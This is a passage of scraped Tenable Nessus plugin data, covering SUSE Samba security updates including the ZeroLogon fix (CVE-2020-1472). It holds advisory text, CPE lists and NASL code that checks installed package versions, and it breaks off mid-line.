reference:\"libsmbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbconf0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libsmbldap0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libtevent-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-client-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-debugsource-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-libs-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"samba-winbind-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:33", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nUpdate to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes = CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for schema mode fatal; (bso#14425);\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : samba (SUSE-SU-2020:2730-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3", "p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-ad-dc", "p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo", "p-cpe:/a:novell:suse_linux:samba-ceph", "p-cpe:/a:novell:suse_linux:samba-ceph-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules", "p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-python3", "p-cpe:/a:novell:suse_linux:samba-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2730-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143724", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2730-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143724);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : samba (SUSE-SU-2020:2730-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some non\ndefault configurations when an attacker established a vulnerable\nNetlogon secure channel connection to a domain controller, using the\nNetlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nUpdate to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows\n server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes =\n CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known\n NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of\n pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for\n schema mode fatal; (bso#14425);\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202730-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76ff2eaa\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Python2 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP2-2020-2730=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2020-2730=1\n\nSUSE Linux Enterprise High Availability 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-SP2-2020-2730=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) 